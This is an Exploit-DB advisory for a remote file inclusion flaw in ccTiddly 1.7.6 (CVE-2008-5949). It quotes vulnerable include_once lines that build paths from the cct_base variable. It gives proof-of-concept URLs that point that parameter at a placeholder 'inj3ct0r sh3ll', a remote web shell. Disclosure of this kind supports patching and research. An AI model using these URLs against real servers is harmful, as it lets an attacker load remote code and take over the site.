ccTiddly 1.7.6 - Multiple Remote File Inclusions

Author: eidelweiss
type: webapps
platform: php
port: 
date_added: 2010-08-05  
date_updated: 2010-08-06  
verified: 1  
codes: CVE-2008-5949;OSVDB-50447  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comccTiddly_v1.7.6.zip  

raw file: 14560.txt  
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Developer: http://tiddlywiki.org/wiki/CcTiddlyDeveloper
Download: http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.6.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Original Advisories: http://eidelweiss-advisories.blogspot.com/2010/08/cctiddly-v176-multiple-remote-file.html

================================================================

ccTiddly is a collaborative server side version of TiddlyWiki.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/7336/)
Vendor Not Fix the vulnerability in all folder !!!

================================================================

	-=[Vuln C0de]=-

[!] path/includes/include.php

	include_once($cct_base."includes/ccAssignments.php");

[!] path/includes/workspace.php

	include_once($cct_base."includes/header.php");
	include_once($cct_base."includes/user.php");
	include_once($cct_base."includes/tiddler.php");

================================================================

	-=[P0C]=-

	http://127.0.0.1/path/includes/include.php?cct_base= [inj3ct0r sh3ll]

	http://127.0.0.1/path/includes/workspace.php?cct_base= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |============================